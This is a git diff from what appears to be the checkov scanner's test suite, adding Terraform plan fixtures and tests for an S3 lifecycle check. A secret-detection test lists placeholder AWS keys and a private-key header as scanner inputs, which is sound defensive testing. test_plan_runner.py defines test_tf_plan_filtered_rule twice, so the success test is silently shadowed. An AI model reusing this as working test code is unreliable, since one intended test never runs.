+                            "noncurrent_version_transition": [],
+                            "transition": []
+                        }
+                    ]
+                },
+                "after_sensitive": {
+                    "rule": [
+                        {
+                            "abort_incomplete_multipart_upload": [
+                                {}
+                            ],
+                            "expiration": [],
+                            "filter": [
+                                {
+                                    "and": [],
+                                    "tag": []
+                                }
+                            ],
+                            "noncurrent_version_expiration": [],
+                            "noncurrent_version_transition": [],
+                            "transition": []
+                        }
+                    ]
+                }
+            }
+        }
+    ]
+}
\ No newline at end of file
diff --git a/tests/terraform/runner/resources/plan/tf_plan_filtered_rule_success.json b/tests/terraform/runner/resources/plan/tf_plan_filtered_rule_success.json
new file mode 100644
index 00000000000..abcc4e658f9
--- /dev/null
+++ b/tests/terraform/runner/resources/plan/tf_plan_filtered_rule_success.json
@@ -0,0 +1,183 @@
+{
+    "format_version": "1.2",
+    "terraform_version": "1.5.7",
+    "planned_values": {
+        "root_module": {
+            "resources": [
+                {
+                    "address": "aws_s3_bucket_lifecycle_configuration.this",
+                    "mode": "managed",
+                    "type": "aws_s3_bucket_lifecycle_configuration",
+                    "name": "this",
+                    "provider_name": "registry.terraform.io/hashicorp/aws",
+                    "schema_version": 0,
+                    "values": {
+                        "bucket": "my_bucket",
+                        "expected_bucket_owner": "",
+                        "id": "the_id",
+                        "rule": [
+                            {
+                                "abort_incomplete_multipart_upload": [
+                                    {
+                                        "days_after_initiation": 7
+                                    }
+                                ],
+                                "expiration": [],
+                                "filter": [
+                                    {
+                                        "and": [],
+                                        "object_size_greater_than": "",
+                                        "object_size_less_than": "",
+                                        "prefix": "",
+                                        "tag": []
+                                    }
+                                ],
+                                "id": "failed-uploads",
+                                "noncurrent_version_expiration": [],
+                                "noncurrent_version_transition": [],
+                                "prefix": "",
+                                "status": "Enabled",
+                                "transition": []
+                            }
+                        ],
+                        "timeouts": null
+                    },
+                    "sensitive_values": {
+                        "rule": [
+                            {
+                                "abort_incomplete_multipart_upload": [
+                                    {}
+                                ],
+                                "expiration": [],
+                                "filter": [
+                                    {
+                                        "and": [],
+                                        "tag": []
+                                    }
+                                ],
+                                "noncurrent_version_expiration": [],
+                                "noncurrent_version_transition": [],
+                                "transition": []
+                            }
+                        ]
+                    }
+                }
+            ]
+        }
+    },
+    "resource_changes": [
+        {
+            "address": "aws_s3_bucket_lifecycle_configuration.this",
+            "mode": "managed",
+            "type": "aws_s3_bucket_lifecycle_configuration",
+            "name": "this",
+            "provider_name": "registry.terraform.io/hashicorp/aws",
+            "change": {
+                "actions": [
+                    "update"
+                ],
+                "before": {
+                    "bucket": "my_bucket",
+                    "expected_bucket_owner": "",
+                    "id": "the_id",
+                    "rule": [
+                        {
+                            "abort_incomplete_multipart_upload": [
+                                {
+                                    "days_after_initiation": 6
+                                }
+                            ],
+                            "expiration": [],
+                            "filter": [
+                                {
+                                    "and": [],
+                                    "object_size_greater_than": "",
+                                    "object_size_less_than": "",
+                                    "prefix": "",
+                                    "tag": []
+                                }
+                            ],
+                            "id": "failed-uploads",
+                            "noncurrent_version_expiration": [],
+                            "noncurrent_version_transition": [],
+                            "prefix": "",
+                            "status": "Enabled",
+                            "transition": []
+                        }
+                    ],
+                    "timeouts": null
+                },
+                "after": {
+                    "bucket": "my_bucket",
+                    "expected_bucket_owner": "",
+                    "id": "the_id",
+                    "rule": [
+                        {
+                            "abort_incomplete_multipart_upload": [
+                                {
+                                    "days_after_initiation": 7
+                                }
+                            ],
+                            "expiration": [],
+                            "filter": [
+                                {
+                                    "and": [],
+                                    "object_size_greater_than": "",
+                                    "object_size_less_than": "",
+                                    "prefix": "",
+                                    "tag": []
+                                }
+                            ],
+                            "id": "failed-uploads",
+                            "noncurrent_version_expiration": [],
+                            "noncurrent_version_transition": [],
+                            "prefix": "",
+                            "status": "Enabled",
+                            "transition": []
+                        }
+                    ],
+                    "timeouts": null
+                },
+                "after_unknown": {},
+                "before_sensitive": {
+                    "rule": [
+                        {
+                            "abort_incomplete_multipart_upload": [
+                                {}
+                            ],
+                            "expiration": [],
+                            "filter": [
+                                {
+                                    "and": [],
+                                    "tag": []
+                                }
+                            ],
+                            "noncurrent_version_expiration": [],
+                            "noncurrent_version_transition": [],
+                            "transition": []
+                        }
+                    ]
+                },
+                "after_sensitive": {
+                    "rule": [
+                        {
+                            "abort_incomplete_multipart_upload": [
+                                {}
+                            ],
+                            "expiration": [],
+                            "filter": [
+                                {
+                                    "and": [],
+                                    "tag": []
+                                }
+                            ],
+                            "noncurrent_version_expiration": [],
+                            "noncurrent_version_transition": [],
+                            "transition": []
+                        }
+                    ]
+                }
+            }
+        }
+    ]
+}
\ No newline at end of file
diff --git a/tests/terraform/runner/resources/plan_and_tf_combine_graph_with_missing_resources/tfplan.json b/tests/terraform/runner/resources/plan_and_tf_combine_graph_with_missing_resources/tfplan.json
index b33a141d549..3264fe8ec74 100644
--- a/tests/terraform/runner/resources/plan_and_tf_combine_graph_with_missing_resources/tfplan.json
+++ b/tests/terraform/runner/resources/plan_and_tf_combine_graph_with_missing_resources/tfplan.json
@@ -186,7 +186,6 @@
                "grant":true,
                "hosted_zone_id":true,
                "id":true,
-               "lifecycle_rule":true,
                "logging":true,
                "object_lock_configuration":true,
                "object_lock_enabled":true,
@@ -264,7 +263,6 @@
                "grant":true,
                "hosted_zone_id":true,
                "id":true,
-               "lifecycle_rule":true,
                "logging":true,
                "object_lock_configuration":true,
                "object_lock_enabled":true,
diff --git a/tests/terraform/runner/resources/plan_nested_child_modules_with_connections/tfplan.json b/tests/terraform/runner/resources/plan_nested_child_modules_with_connections/tfplan.json
index f3540a6b8ea..82d2e13e1b7 100644
--- a/tests/terraform/runner/resources/plan_nested_child_modules_with_connections/tfplan.json
+++ b/tests/terraform/runner/resources/plan_nested_child_modules_with_connections/tfplan.json
@@ -1816,10 +1816,6 @@
                 "default": null,
                 "description": "(Optional) A valid bucket policy JSON document. Note that if the policy document is not specific enough (but still valid), Terraform may view the policy as constantly changing in a terraform plan. In this case, please make sure you use the verbose/specific version of the policy. For more information about building AWS IAM policy documents with Terraform, see the AWS IAM Policy Document Guide."
               },
-              "putin_khuylo": {
-                "default": true,
-                "description": "Do you agree that Putin doesn't respect Ukrainian sovereignty and territorial integrity? More info: https://en.wikipedia.org/wiki/Putin_khuylo!"
-              },
               "replication_configuration": {
                 "default": {},
                 "description": "Map containing cross-region replication configuration."
diff --git a/tests/terraform/runner/test_plan_runner.py b/tests/terraform/runner/test_plan_runner.py
index 9733389c495..b473d9cdccf 100644
--- a/tests/terraform/runner/test_plan_runner.py
+++ b/tests/terraform/runner/test_plan_runner.py
@@ -68,6 +68,26 @@ def test_runner_two_checks_only(self):
         self.assertEqual(report.get_summary()["failed"], 3)
         self.assertEqual(report.get_summary()["passed"], 3)
 
+    def test_tf_plan_filtered_rule(self):
+        if not self.db_connector == RustworkxConnector:
+            return
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+        valid_plan_path = current_dir + "/resources/plan/tf_plan_filtered_rule_success.json"
+        runner = Runner(db_connector=self.db_connector())
+        checks_allowlist = ['CKV_AWS_300']
+        report = runner.run(files=[valid_plan_path], runner_filter=RunnerFilter(framework=["terraform_plan"], checks=checks_allowlist))
+        assert len(report.passed_checks) == 1
+
+    def test_tf_plan_filtered_rule(self):
+        if not self.db_connector == RustworkxConnector:
+            return
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+        valid_plan_path = current_dir + "/resources/plan/tf_plan_filtered_rule_fail.json"
+        runner = Runner(db_connector=self.db_connector())
+        checks_allowlist = ['CKV_AWS_300']
+        report = runner.run(files=[valid_plan_path], runner_filter=RunnerFilter(framework=["terraform_plan"], checks=checks_allowlist))
+        assert len(report.failed_checks) == 1
+
     def test_runner_record_severity(self):
         current_dir = os.path.dirname(os.path.realpath(__file__))
         valid_plan_path = current_dir + "/resources/plan/tfplan.json"
@@ -256,7 +276,7 @@ def test_plan_runner_with_empty_vpc_connection(self):
         self.assertEqual(report.get_exit_code({'soft_fail': False, 'soft_fail_checks': [], 'soft_fail_threshold': None, 'hard_fail_checks': [], 'hard_fail_threshold': None}), 1)
         self.assertEqual(report.get_exit_code({'soft_fail': True, 'soft_fail_checks': [], 'soft_fail_threshold': None, 'hard_fail_checks': [], 'hard_fail_threshold': None}), 0)
 
-        self.assertEqual(report.get_summary()["failed"], 106)
+        self.assertEqual(report.get_summary()["failed"], 105)
 
     def test_runner_child_modules(self):
         current_dir = os.path.dirname(os.path.realpath(__file__))
@@ -796,6 +816,7 @@ def test_plan_and_tf_combine_graph(self):
         assert report.passed_checks[0].file_path.endswith('.json')
         assert report.passed_checks[1].file_path.endswith('.json')
 
+    @mock.patch.dict(os.environ, {'EVAL_TF_PLAN_AFTER_UNKNOWN': 'True'})
     def test_plan_and_tf_combine_graph_with_missing_resources(self):
         tf_file_path = Path(__file__).parent / "resources/plan_and_tf_combine_graph_with_missing_resources/tfplan.json"
         repo_path = Path(__file__).parent / "resources/plan_and_tf_combine_graph_with_missing_resources"
diff --git a/tests/terraform/runner/test_runner.py b/tests/terraform/runner/test_runner.py
index 25538f65a0d..05c503a5753 100644
--- a/tests/terraform/runner/test_runner.py
+++ b/tests/terraform/runner/test_runner.py
@@ -154,6 +154,24 @@ def test_py_graph_check(self):
         assert 'aws_db_instance.default' in failed_resources
         assert 'aws_db_instance.disabled' in failed_resources
 
+    def test_for_each_check(self):
+        if not self.db_connector == RustworkxConnector:
+            return
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+        valid_dir_path = current_dir + "/resources/for_each"
+        runner = Runner(db_connector=self.db_connector())
+        checks_allowlist = ['CKV_AWS_186']
+        report = runner.run(root_folder=valid_dir_path, runner_filter=RunnerFilter(framework=["terraform"], checks=checks_allowlist))
+        report_json = report.get_json()
+        self.assertIsInstance(report_json, str)
+        self.assertIsNotNone(report_json)
+        self.assertIsNotNone(report.get_test_suite())
+        assert len(report.failed_checks) == 2
+        assert len(report.passed_checks) == 0
+        failed_resources = [c.resource for c in report.failed_checks]
+        assert 'module.simple[0].aws_s3_bucket_object.this_file' in failed_resources
+        assert 'module.simple[1].aws_s3_bucket_object.this_file' in failed_resources
+
     def test_runner_passing_valid_tf(self):
         current_dir = os.path.dirname(os.path.realpath(__file__))
 
@@ -170,7 +188,7 @@ def test_runner_passing_valid_tf(self):
              'hard_fail_threshold': None}), 1)
         summary = report.get_summary()
         self.assertGreaterEqual(summary['passed'], 1)
-        self.assertEqual(9, summary['failed'])
+        self.assertEqual(10, summary['failed'])
         self.assertEqual(1, summary['skipped'])
         self.assertEqual(0, summary["parsing_errors"])
 
@@ -319,7 +337,7 @@ def test_runner_specific_file(self):
         # self.assertEqual(report.get_exit_code(), 0)
         summary = report.get_summary()
         self.assertGreaterEqual(summary['passed'], 1)
-        self.assertEqual(5, summary['failed'])
+        self.assertEqual(6, summary['failed'])
         self.assertEqual(0, summary["parsing_errors"])
 
     def test_check_ids_dont_collide(self):
@@ -393,6 +411,9 @@ def test_no_missing_ids(self):
             if f'CKV_GCP_{i}' == 'CKV_GCP_5':
                 # CKV_GCP_5 is no longer a valid platform check
                 continue
+            if f'CKV_GCP_{i}' == 'CKV_GCP_19':
+                # CKV_GCP_19 involved a configuration which was deprecated by GCP
+                continue
             if f'CKV_GCP_{i}' == 'CKV_GCP_67':
                 # CKV_GCP_67 is not deployable anymore https://cloud.google.com/kubernetes-engine/docs/how-to/hardening-your-cluster#protect_node_metadata
                 continue
@@ -448,7 +469,7 @@ def test_no_missing_ids(self):
         for check_list in [aws_checks, gcp_checks, azure_checks]:
             check_list.sort(reverse=True, key=lambda s: int(s.split('_')[-1]))
 
-        for i in range(1, len(aws_checks) + 5):
+        for i in range(1, len(aws_checks) + 4):
             if f'CKV2_AWS_{i}' == 'CKV2_AWS_17':
                 # CKV2_AWS_17 was overly keen and those resources it checks are created by default
                 continue
@@ -464,12 +485,15 @@ def test_no_missing_ids(self):
             if f'CKV2_AWS_{i}' == 'CKV2_AWS_26':
                 # Was a test policy
                 continue
+            if f'CKV2_AWS_{i}' == 'CKV2_AWS_67':
+                # Too many edge cases for ways to get a KMS key connected to S3
+                continue
             self.assertIn(f'CKV2_AWS_{i}', aws_checks,
                           msg=f'The new AWS violation should have the ID "CKV2_AWS_{i}"')
         for i in range(1, len(gcp_checks) + 1):
             self.assertIn(f'CKV2_GCP_{i}', gcp_checks,
                           msg=f'The new GCP violation should have the ID "CKV2_GCP_{i}"')
-        for i in range(1, len(azure_checks) + 2):
+        for i in range(1, len(azure_checks) + 1):
             if f'CKV2_AZURE_{i}' == 'CKV2_AZURE_18':
                 # duplicate of CKV2_AZURE_1
                 continue
@@ -1279,6 +1303,18 @@ def test_resource_ids_nested_modules(self):
         self.assertEqual(len(resources_ids), 3)
         self.assertEqual(expected_resources_ids, resources_ids)
 
+    def test_list_of_routes(self):
+        resources_path = os.path.join(
+            os.path.dirname(os.path.realpath(__file__)), "resources", "list_of_routes")
+        checks_allow_list = ['CKV2_AWS_44']
+
+        runner = Runner(db_connector=self.db_connector())
+        report = runner.run(root_folder=resources_path, external_checks_dir=None,
+                            runner_filter=RunnerFilter(framework=["terraform"], checks=checks_allow_list))
+
+        self.assertEqual(len(report.passed_checks), 0)
+        self.assertEqual(len(report.failed_checks), 1)
+
     def test_resource_values_dont_exist(self):
         resources_path = os.path.join(
             os.path.dirname(os.path.realpath(__file__)), "resources", "resource_value_without_var")
diff --git a/tests/terraform_json/test_parser.py b/tests/terraform_json/test_parser.py
index a822195c616..383f94245e9 100644
--- a/tests/terraform_json/test_parser.py
+++ b/tests/terraform_json/test_parser.py
@@ -1,4 +1,4 @@
-from checkov.terraform_json.parser import hclify
+from checkov.terraform_json.parser import hclify, prepare_definition
 
 
 def test_hclify():
@@ -34,3 +34,29 @@ def test_hclify():
             }
         ],
     }
+
+
+def test_prepare_definition_locals():
+    cdk_definition = {
+        "locals": {
+            "bucket_name": "example",
+            "http_endpoint": "disabled",
+            "__startline__": 1,
+            "__endline__": 2,
+        }
+    }
+
+    # when
+    tf_definition = prepare_definition(cdk_definition)
+
+    # then
+    assert tf_definition == {
+        "locals": [
+            {
+                "bucket_name": ["example"],
+                "http_endpoint": ["disabled"],
+                "__startline__": 1,
+                "__endline__": 2,
+            }
+        ]
+    }
diff --git a/tests/unit/test_secrets.py b/tests/unit/test_secrets.py
index ba41f491c2f..9c330f867f4 100644
--- a/tests/unit/test_secrets.py
+++ b/tests/unit/test_secrets.py
@@ -11,7 +11,8 @@ def test_secrets(self):
             'AKIAIOSFODNN7EXAMPLE',  # checkov:skip=CKV_SECRET_2 test secret
             'wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY',  # checkov:skip=CKV_SECRET_6 test secret
             '-----BEGIN RSA PRIVATE KEY-----\n',  # checkov:skip=CKV_SECRET_13 test secret
-            'Hello from Bridgecrew'
+            'Hello from Bridgecrew',
+            'cert-manager.io/secret: org/repo',
         ]
 
         # check that no category checks all